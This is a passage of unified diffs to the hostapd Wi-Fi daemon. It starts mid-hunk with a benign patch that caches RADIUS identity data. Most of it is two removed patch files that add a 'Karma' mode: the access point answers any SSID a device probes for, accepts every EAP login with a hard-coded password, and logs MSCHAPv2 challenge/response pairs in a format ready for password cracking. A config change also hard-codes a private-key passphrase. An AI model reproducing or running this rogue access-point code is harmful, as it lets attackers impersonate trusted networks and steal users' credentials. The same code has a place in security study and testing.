@@ -169,6 +183,25 @@
eapol->identity, eapol->identity_len);
}
+/*Added to get CUI from the cache*/
+
+
+ if (entry->cui) {
+ os_free(eapol->cui);
+
+ eapol->cui = os_malloc(entry->cui_len);
+ eapol->cuiAvailable=TRUE;
+ if (eapol->cui) {
+ eapol->cui_len = entry->cui_len;
+ os_memcpy(eapol->cui, entry->cui,
+ entry->cui_len); /*copy the CUI attribute value to EAPOL data structure*/
+ }
+ wpa_hexdump_ascii(MSG_DEBUG, "CUIfrom PMKSA",
+ eapol->cui, eapol->cui_len);
+ }
+
+ /*Added to get CUI from the cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_free_class(&eapol->radius_class);
radius_copy_class(&eapol->radius_class, &entry->radius_class);
@@ -180,6 +213,7 @@
eapol->eap_type_authsrv = entry->eap_type_authsrv;
((struct sta_info *) eapol->sta)->vlan_id = entry->vlan_id;
+ printf ("GETTING CACHE ENTRY\n");
}
diff -urN hostapd-1.0.orig//src/ap/pmksa_cache_auth.h hostapd-1.0/src/ap/pmksa_cache_auth.h
--- hostapd-1.0.orig//src/ap/pmksa_cache_auth.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/pmksa_cache_auth.h 2012-07-17 18:40:21.000000000 +0800
@@ -31,6 +31,8 @@
u8 *identity;
size_t identity_len;
+ u8 *cui; /* cui by me*/
+ size_t cui_len; /*Size of the cached cui by me*/
struct radius_class_data radius_class;
u8 eap_type_authsrv;
int vlan_id;
diff -urN hostapd-1.0.orig//src/common/ieee802_11_common.c hostapd-1.0/src/common/ieee802_11_common.c
--- hostapd-1.0.orig//src/common/ieee802_11_common.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/common/ieee802_11_common.c 2012-07-17 18:40:21.000000000 +0800
@@ -31,8 +31,8 @@
if (elen < 4) {
if (show_errors) {
wpa_printf(MSG_MSGDUMP, "short vendor specific "
- "information element ignored (len=%lu)",
- (unsigned long) elen);
+ "information element ignored (len=%lu)",
+ (unsigned long) elen);
}
return -1;
}
diff -urN hostapd-1.0.orig//src/eapol_auth/eapol_auth_sm_i.h hostapd-1.0/src/eapol_auth/eapol_auth_sm_i.h
--- hostapd-1.0.orig//src/eapol_auth/eapol_auth_sm_i.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eapol_auth/eapol_auth_sm_i.h 2012-07-17 18:40:21.000000000 +0800
@@ -75,6 +75,7 @@
/* variables */
Boolean eapolLogoff;
Boolean eapolStart;
+ Boolean cuiAvailable; /*to check CUI is available in AcessAccept*/
PortTypes portMode;
unsigned int reAuthCount;
/* constants */
@@ -159,6 +160,8 @@
u8 last_eap_id; /* last used EAP Identifier */
u8 *identity;
size_t identity_len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI attribute length*/
u8 eap_type_authsrv; /* EAP type of the last EAP packet from
* Authentication server */
u8 eap_type_supp; /* EAP type of the last EAP packet from Supplicant */
diff -urN hostapd-1.0.orig//src/radius/radius.c hostapd-1.0/src/radius/radius.c
--- hostapd-1.0.orig//src/radius/radius.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/radius/radius.c 2012-07-17 18:40:21.000000000 +0800
@@ -24,16 +24,16 @@
/**
* struct radius_msg - RADIUS message structure for new and parsed messages
*/
-struct radius_msg {
+//struct radius_msg {
/**
* buf - Allocated buffer for RADIUS message
*/
- struct wpabuf *buf;
+ //struct wpabuf *buf;
/**
* hdr - Pointer to the RADIUS header in buf
*/
- struct radius_hdr *hdr;
+ //struct radius_hdr *hdr;
/**
* attr_pos - Array of indexes to attributes
@@ -41,18 +41,18 @@
* The values are number of bytes from buf to the beginning of
* struct radius_attr_hdr.
*/
- size_t *attr_pos;
+ //size_t *attr_pos;
/**
* attr_size - Total size of the attribute pointer array
*/
- size_t attr_size;
+ //size_t attr_size;
/**
* attr_used - Total number of attributes in the array
*/
- size_t attr_used;
-};
+ //size_t attr_used;
+//};
struct radius_hdr * radius_msg_get_hdr(struct radius_msg *msg)
@@ -66,7 +66,7 @@
return msg->buf;
}
-
+/*
static struct radius_attr_hdr *
radius_get_attr_hdr(struct radius_msg *msg, int idx)
{
@@ -74,7 +74,7 @@
(wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
}
-
+*/
static void radius_msg_set_hdr(struct radius_msg *msg, u8 code, u8 identifier)
{
msg->hdr->code = code;
diff -urN hostapd-1.0.orig//src/radius/radius.h hostapd-1.0/src/radius/radius.h
--- hostapd-1.0.orig//src/radius/radius.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/radius/radius.h 2012-07-17 18:40:21.000000000 +0800
@@ -21,6 +21,45 @@
#pragma pack(push, 1)
#endif /* _MSC_VER */
+/************************/
+struct radius_msg {
+ /**
+ * buf - Allocated buffer for RADIUS message
+ */
+ struct wpabuf *buf;
+
+ /**
+ * hdr - Pointer to the RADIUS header in buf
+ */
+ struct radius_hdr *hdr;
+
+ /**
+ * attr_pos - Array of indexes to attributes
+ *
+ * The values are number of bytes from buf to the beginning of
+ * struct radius_attr_hdr.
+ */
+ size_t *attr_pos;
+
+ /**
+ * attr_size - Total size of the attribute pointer array
+ */
+ size_t attr_size;
+
+ /**
+ * attr_used - Total number of attributes in the array
+ */
+ size_t attr_used;
+};
+
+
+
+
+/***********************/
+
+
+
+
struct radius_hdr {
u8 code;
u8 identifier;
@@ -201,6 +240,10 @@
size_t secret_len);
struct radius_attr_hdr * radius_msg_add_attr(struct radius_msg *msg, u8 type,
const u8 *data, size_t data_len);
+
+/****************************/
+
+/*****************************/
struct radius_msg * radius_msg_parse(const u8 *data, size_t len);
int radius_msg_add_eap(struct radius_msg *msg, const u8 *data,
size_t data_len);
@@ -238,7 +281,13 @@
u32 val = htonl(value);
return radius_msg_add_attr(msg, type, (u8 *) &val, 4) != NULL;
}
-
+/**********************/
+static struct radius_attr_hdr * radius_get_attr_hdr(struct radius_msg *msg, int idx)
+{
+ return (struct radius_attr_hdr *)
+ (wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
+}
+/**************************/
static inline int radius_msg_get_attr_int32(struct radius_msg *msg, u8 type,
u32 *value)
{


@ -1,481 +0,0 @@
diff -urN hostapd-0.7.3.orig/hostapd/Makefile hostapd-0.7.3/hostapd/Makefile
--- hostapd-0.7.3.orig/hostapd/Makefile 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/hostapd/Makefile 2011-05-02 15:59:46.787000009 +0800
@@ -3,7 +3,7 @@
endif
ifndef CFLAGS
-CFLAGS = -MMD -O2 -Wall -g
+CFLAGS = -MMD -O2 -Wall -DDEBUG -g -pg
endif
CFLAGS += -I../src
@@ -84,6 +84,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -urN hostapd-0.7.3.orig/hostapd/hostapd.conf hostapd-0.7.3/hostapd/hostapd.conf
--- hostapd-0.7.3.orig/hostapd/hostapd.conf 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/hostapd/hostapd.conf 2011-05-02 15:59:46.788000008 +0800
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -88,7 +89,7 @@
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -99,14 +100,14 @@
# Operation mode (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g,
# Default: IEEE 802.11b
-hw_mode=a
+hw_mode=b
# Channel number (IEEE 802.11)
# (default: 0, i.e., not set)
# Please note that some drivers (e.g., madwifi) do not use this value from
# hostapd and the channel will need to be configuration separately with
# iwconfig.
-channel=60
+channel=1
# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
beacon_int=100
@@ -410,7 +411,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -418,7 +419,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -460,16 +461,18 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/sf_bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
@@ -477,9 +480,11 @@
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
#private_key_passwd=secret passphrase
+private_key_passwd=Cricket8
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -674,6 +679,7 @@
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -695,6 +701,7 @@
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -urN hostapd-0.7.3.orig/hostapd/main.c hostapd-0.7.3/hostapd/main.c
--- hostapd-0.7.3.orig/hostapd/main.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/hostapd/main.c 2011-05-02 16:01:06.320000003 +0800
@@ -36,6 +36,10 @@
extern int wpa_debug_show_keys;
extern int wpa_debug_timestamp;
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_interfaces {
size_t count;
@@ -458,7 +462,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] "
"<configuration file(s)>\n"
"\n"
"options:\n"
@@ -468,7 +472,9 @@
" -P PID file\n"
" -K include key data in debug messages\n"
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes using requested SSID\n"
+ " -A [karma] enable authentication attempt logging\n");
exit(1);
}
@@ -486,7 +492,7 @@
return -1;
for (;;) {
- c = getopt(argc, argv, "BdhKP:tv");
+ c = getopt(argc, argv, "BdhKP:tvRA");
if (c < 0)
break;
switch (c) {
@@ -511,6 +517,12 @@
case 't':
wpa_debug_timestamp++;
break;
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
case 'v':
show_version();
exit(1);
diff -urN hostapd-0.7.3.orig/src/ap/beacon.c hostapd-0.7.3/src/ap/beacon.c
--- hostapd-0.7.3.orig/src/ap/beacon.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/ap/beacon.c 2011-05-02 15:59:46.789000006 +0800
@@ -14,6 +14,11 @@
* See README and COPYING for more details.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -250,7 +255,24 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
}
-
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ else if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+
+ karma_logger(0, message);
+ free(message);
+
+ ssid = (char *)elems.ssid;
+ ssid_len = elems.ssid_len;
+ //if (sta)
+ // sta->ssid_probe = &elems.ssid;
+ }
if (!ssid) {
if (!(mgmt->da[0] & 0x01)) {
char ssid_txt[33];
diff -urN hostapd-0.7.3.orig/src/ap/hostapd.c hostapd-0.7.3/src/ap/hostapd.c
--- hostapd-0.7.3.orig/src/ap/hostapd.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/ap/hostapd.c 2011-05-02 15:59:46.789000006 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#include "utils/common.h"
diff -urN hostapd-0.7.3.orig/src/ap/ieee802_11.c hostapd-0.7.3/src/ap/ieee802_11.c
--- hostapd-0.7.3.orig/src/ap/ieee802_11.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/ap/ieee802_11.c 2011-05-02 15:59:46.790000004 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -533,8 +535,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -urN hostapd-0.7.3.orig/src/eap_server/eap_server.c hostapd-0.7.3/src/eap_server/eap_server.c
--- hostapd-0.7.3.orig/src/eap_server/eap_server.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/eap_server/eap_server.c 2011-05-02 15:59:46.791000002 +0800
@@ -18,6 +18,11 @@
* backend_auth configuration variable to TRUE.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -99,24 +104,51 @@
int eap_user_get(struct eap_sm *sm, const u8 *identity, size_t identity_len,
int phase2)
{
- struct eap_user *user;
-
- if (sm == NULL || sm->eapol_cb == NULL ||
- sm->eapol_cb->get_eap_user == NULL)
- return -1;
-
- eap_user_free(sm->user);
+ struct eap_user *user;
+ char *username = NULL;
+ char *message = NULL;
+
+ eap_user_free(sm->user);
sm->user = NULL;
- user = os_zalloc(sizeof(*user));
- if (user == NULL)
- return -1;
+ user = os_zalloc(sizeof(*user));
+ if (user == NULL)
+ return -1;
+
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ if (karma_eap_auth)
+ {
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else
+ {
+ if (sm == NULL || sm->eapol_cb == NULL ||
+ sm->eapol_cb->get_eap_user == NULL)
+ return -1;
- if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
- identity_len, phase2, user) != 0) {
- eap_user_free(user);
- return -1;
- }
+ if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
+ identity_len, phase2, user) != 0) {
+ eap_user_free(user);
+ return -1;
+ }
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -urN hostapd-0.7.3.orig/src/eap_server/eap_server_mschapv2.c hostapd-0.7.3/src/eap_server/eap_server_mschapv2.c
--- hostapd-0.7.3.orig/src/eap_server/eap_server_mschapv2.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/eap_server/eap_server_mschapv2.c 2011-05-02 15:59:46.792000002 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -289,13 +291,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -335,6 +339,38 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth)
+ {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -urN hostapd-0.7.3.orig/src/karma/karma.c hostapd-0.7.3/src/karma/karma.c
--- hostapd-0.7.3.orig/src/karma/karma.c 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-0.7.3/src/karma/karma.c 2011-05-02 15:59:46.792000002 +0800
@@ -0,0 +1,43 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ cur_time = time(NULL);
+ (void) time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s:%s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -urN hostapd-0.7.3.orig/src/karma/karma.h hostapd-0.7.3/src/karma/karma.h
--- hostapd-0.7.3.orig/src/karma/karma.h 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-0.7.3/src/karma/karma.h 2011-05-02 15:59:46.792000002 +0800
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);
diff -urN hostapd-0.7.3.orig/src/utils/wpa_debug.c hostapd-0.7.3/src/utils/wpa_debug.c
--- hostapd-0.7.3.orig/src/utils/wpa_debug.c 2010-09-07 23:43:39.000000000 +0800
+++ hostapd-0.7.3/src/utils/wpa_debug.c 2011-05-02 15:59:46.793000003 +0800
@@ -22,6 +22,8 @@
static int wpa_debug_syslog = 0;
#endif /* CONFIG_DEBUG_SYSLOG */
+/* Karma Mode */
+#include "karma/karma.h"
#ifdef CONFIG_DEBUG_FILE
static FILE *out_file = NULL;


@ -1,465 +0,0 @@
diff -urN hostapd-1.0.orig//hostapd/Makefile hostapd-1.0/hostapd/Makefile
--- hostapd-1.0.orig//hostapd/Makefile 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/hostapd/Makefile 2012-07-17 18:36:53.318959033 +0800
@@ -3,7 +3,7 @@
endif
ifndef CFLAGS
-CFLAGS = -MMD -O2 -Wall -g
+CFLAGS = -MMD -O2 -Wall -DDEBUG -g -pg
endif
CFLAGS += -I../src
@@ -95,6 +95,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -urN hostapd-1.0.orig//hostapd/hostapd.conf hostapd-1.0/hostapd/hostapd.conf
--- hostapd-1.0.orig//hostapd/hostapd.conf 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/hostapd/hostapd.conf 2012-07-17 18:36:53.319959023 +0800
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -88,7 +89,7 @@
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -413,7 +414,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -421,7 +422,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -463,16 +464,18 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/sf_bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
@@ -480,9 +483,11 @@
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
#private_key_passwd=secret passphrase
+private_key_passwd=Cricket8
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -680,6 +685,7 @@
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -701,6 +707,7 @@
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -urN hostapd-1.0.orig//hostapd/main.c hostapd-1.0/hostapd/main.c
--- hostapd-1.0.orig//hostapd/main.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/hostapd/main.c 2012-07-17 18:37:57.724959001 +0800
@@ -39,6 +39,10 @@
extern struct wpa_driver_ops *wpa_drivers[];
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_global {
void **drv_priv;
@@ -521,7 +525,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
"<configuration file(s)>\n"
"\n"
"options:\n"
@@ -535,7 +539,9 @@
" -f log output to debug file instead of stdout\n"
#endif /* CONFIG_DEBUG_FILE */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes using requested SSID\n"
+ " -A [karma] enable authentication attempt logging\n");
exit(1);
}
@@ -564,7 +570,7 @@
return -1;
for (;;) {
- c = getopt(argc, argv, "Bde:f:hKP:tv");
+ c = getopt(argc, argv, "Bde:f:hKP:tvRA");
if (c < 0)
break;
switch (c) {
@@ -595,6 +601,12 @@
case 't':
wpa_debug_timestamp++;
break;
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
case 'v':
show_version();
exit(1);
diff -urN hostapd-1.0.orig//src/ap/beacon.c hostapd-1.0/src/ap/beacon.c
--- hostapd-1.0.orig//src/ap/beacon.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/beacon.c 2012-07-17 18:36:53.322959001 +0800
@@ -14,6 +14,11 @@
* See README and COPYING for more details.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -283,7 +288,24 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
}
-
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ else if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+
+ karma_logger(0, message);
+ free(message);
+
+ ssid = (char *)elems.ssid;
+ ssid_len = elems.ssid_len;
+ //if (sta)
+ // sta->ssid_probe = &elems.ssid;
+ }
if (!ssid) {
if (!(mgmt->da[0] & 0x01)) {
char ssid_txt[33];
diff -urN hostapd-1.0.orig//src/ap/hostapd.c hostapd-1.0/src/ap/hostapd.c
--- hostapd-1.0.orig//src/ap/hostapd.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/hostapd.c 2012-07-17 18:36:53.323958995 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#include "utils/common.h"
